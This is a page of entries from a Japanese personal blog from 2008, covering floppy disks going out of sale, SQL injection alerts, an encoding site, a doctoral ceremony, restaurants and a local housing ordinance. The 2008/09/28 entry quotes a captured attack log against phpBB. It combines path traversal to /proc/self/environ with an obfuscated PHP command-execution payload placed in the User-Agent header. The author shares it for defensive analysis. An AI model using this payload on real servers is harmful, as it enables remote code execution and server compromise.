BLOGTIMES
«Prev || ... 1110 · 1111 · 1112 · 1113 · 1114 · 1115 · 1116 · 1117 · 1118 ·... | | Next»
2008/10/03

3.5インチフロッピーが終売に

floppy 

三菱からフロッピーディスクの終売のお知らせが出ています。

三菱化学、3.5インチフロッピーの販売を終了

三菱化学メディア株式会社は2日、3.5インチFD(フロッピーディスク)を2009年3月末で販売終了すると発表した。原料の磁気ディスクが生産を終了したため。同社は、供給継続の方向性を模索したが、今後の安定的な供給が困難であると判断。販売終了を決定した。

そういえば、今年の5月にハードディスクがクラッシュしたときにフロッピーが買えなくて困りましたが、こうして終売になると今後はますますそういう機会が増えそうです。ということで、いろいろ調べてみたところUSBメモリでFDDのふりをしてくれる製品があるようです*1。例えば、HP USBフロッピー ドライブ キーとか、記憶領域の一部をUSB-FDDとして認識・ブート可能なUSBメモリとか。このあたりの製品をひとつくらい買っておいてもいいかもしれません。


at 21:23 |
2008/10/02

忍び寄るSQLインジェクションの影


セキュリティホール memoゴルフダイジェスト・オンラインで不正アクセス被害発生というエントリが載っていたのでいろいろと調べていたらSQLインジェクションを行うボットついてLACが注意喚起しているエントリがありました。

【CSL】CSL緊急注意喚起レポート~新手のSQLインジェクションを行使するボットの確認~ | LAC

新手のSQLインジェクション攻撃を実行するボットを確認しました。このボットに関しては海外1でも報告されています。この攻撃は、マイクロソフト社製のWebサーバIIS/ASP/ASP.NET上で開発されたWebサイトを狙ってデータベースの改ざんを行います。改ざんを狙うボットや攻撃はこれまで数多く存在していました。今回、注意喚起を行う理由は、攻撃方法が、これまでほとんど観測されていない手法だからです。

この注意喚起レポートで取り上げられているGETリクエストの例に何か見覚えがあるので、WAFのログを確認してみたら、Cookie経由ではありませんが同様と思われるSQLインジェクション攻撃をしようとした形跡が残っていました。

[忍び寄るSQLインジェクションの影 の続きを読む]

    at 22:47 |
    2008/10/01

    ブラウザから各種エンコード・デコードを試す


    以前にブラウザでbase64encodeというエントリを書きましたが、もっといろいろなエンコード/デコードをやってくれるサイトを見つけたのでメモ。

    エンコードマニアックス - 各種エンコードやハッシュを一発作成

    HTML実体参照・数値参照・Base64・URLエンコード・MIME・uuencode・PHP Serialize・JavaScript
    MD5・MD4・SHA-1,256,384,512・CRC32・unix passwd
    半角・全角・ひらがな・カタカナ・ローマ字・分かち書き・Camelize・複数形・単数形に一括変換!

    ちょっと気になるのはこのエンコード結果のURLという部分があって、結果がサイトに保存されてしまうようなので、人に知られると困るようなものの変換はやめておいたほうが良さそうです。


      at 22:21 |
      2008/09/30

      ハカセが博士になる日

      doctoral  ご挨拶 
      学位記 - ハカセが博士になる日

      今日は博士課程の最後のイベント、学位授与式に参加して、学長から学位記をもらって来ました。
      最後までなんだかんだあってバタバタしましたが、たくさんの人の支援を頂き、無事にこの日を迎えることができたことは率直に嬉しいです。

      正直、博士をもう一度取るのはもうごめんなので、学生として迎える最後の卒業式だったはずなのですが、9月ということもあり、あっさりと終わりすぎてちょっと物足りない感じでした。

      ちなみにエントリのタイトルは両親のコメントから取っています。親にそう言われて思い出したのですが、小学校のころから科学が得意だったので、友人から「ハカセ」と親しみを込めて呼ばれることが多く、また、そう呼ばれることが嬉しくもありました。自分としてはそういう博士でありたいと思っています。学位が取れたからといって僕自身のスキルが急に変化するわけでもないので、今後も自分の道を突き進んでいこうと思っています。今後ともよろしくお願いします。


        at 12:24 |
        2008/09/29

        BROZERS' ホームデリバリー

        humberger 
        アボカドバーガー - BROZERS' ホームデリバリー

        知人のオフィスにて人形町のBROZERS'のハンバーガーのデリバリーを食べながらミーティングしました。

        デリバリーのハンバーガーというと個人的には本郷のFire Houseが一番だと思うのですが、こちらも負けていません。少なくともFire Houseよりボリュームがあり、付け合せはポテトだけでなく、オニオンリングも入っているところは個人的にポイントが高いです。

        Fire Houseもそうですが、こちらも実店舗に行ってみたいですね。

        [BROZERS' ホームデリバリー の続きを読む]

          at 19:13 |

          Ostrea


          ランチ ブッフェ - Ostrea

          今日はOstreaにてランチ。夜はオイスターバーらしいのですが、ランチメニューはブッフェなので、特に注文は聞かれません。残念ながらランチの牡蠣は牡蠣フライのみです。

          デザートから食後のコーヒーまで楽しめて、1000円というのはコストパフォーマンスは高いと思いますが、ブッフェだとついつい食べ過ぎてしまうのがいけませんね。

          [Ostrea の続きを読む]

            at 13:06 |
            2008/09/28

            phpbb 向けの Exploit らしい

            PoC 

            最近、WAFのログに明らかに攻撃コードと思われるログが残るようになりました。
            どうやらphpbbの脆弱性を突くためのもののようです。

            GET /item//modules/Forums/admin/admin_smilies.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 Connection: close Host: blog.cles.jp User-Agent: <? $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13("\n",$x0c); }elseif($x11('shell_exec')){$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?>

            コードには難読化がかけられているので、一目では何をやっているのか良く分かりません。ということで、ちょっとデコードを試みてみることにしました。

            本エントリのコードは不用意に実行すると危険なので、何かを試す際には自己責任でお願いします

            [phpbb 向けの Exploit らしい の続きを読む]

              at 21:02 |
              2008/09/27

              博士論文刷りあがる

              doctoral 
              博士学位論文の表紙 - 博士論文刷りあがる

              別件で研究室に立ち寄ったら、印刷所に入稿しておいた博士論文が届いていました。

              これが博士課程3年半の成果であり、大学図書館と国立国会図書館に納本されます。
              納本後はここで検索できるようになるはずです。

              学術研究データベース・リポジトリ 博士論文書誌データベース

              我が国の国公私立大学等で授与された博士号の学位論文について,標題,著者名,学位の種類等を収録したデータベースです。博士課程を持つ大学等のほとんどを網羅していますので,博士論文(学位論文)を包括的に検索することができます。

              後のイベントは火曜日の学位記授与式を残すのみになりました。


                at 16:12 |
                2008/09/26

                イスタンブール

                turkey 
                 - イスタンブール - イスタンブール
                 - イスタンブール - イスタンブール

                お世話になった某さんの送別会のため、赤坂のトルコ料理店、イスタンブールに行ってきました。

                トルコ料理を食べるのは、去年実際にトルコに行って以来でしたが、やっぱりおいしいですね。

                [イスタンブール の続きを読む]

                  at 19:20 |
                  2008/09/25

                  文京区のワンルーム規制

                  law 

                  R25に文京区が1戸の専有面積が25平方メートルを下回るマンションを建ててはいけないという条例を作ったという記事が載っていました。

                  [社会] ワンルームマンション規制が導入される背景とは? | RxR | R25.jp

                  2000年前後から、不況の影響で地価が下がり、利回りの高さから投資対象として注目されるようになったワンルームマンション。だが、都内では近年、ワンルームマンションを規制しようという動きが広まっている。直近では7月、文京区が「1戸の専有面積が25平方メートルを下回るマンションを建ててはいけない」とする条例を制定。文京区のように部屋の広さ制限などの手法で規制しているのは現在、23区中15区にものぼる。

                  文京区のウェブを検索してみたら、確かに「文京区ワンルームマンション等の建築及び管理に関する条例」というのがこの記事に取り上げられている条例のようです。年少人口の増加への寄与をなんて書いてありますが、だったら保育園とかそういうものを整備したほうがいいとおもうんですが、結局は税収目当てなんでしょうね。ちなみに、マナーというのであればウチの隣の一戸建てから毎朝6時前に聞こえてくる詩吟をなんとかして欲しいんですが。。。。


                    at 23:01 |
                    «Prev || ... 1110 · 1111 · 1112 · 1113 · 1114 · 1115 · 1116 · 1117 · 1118 ·... | | Next»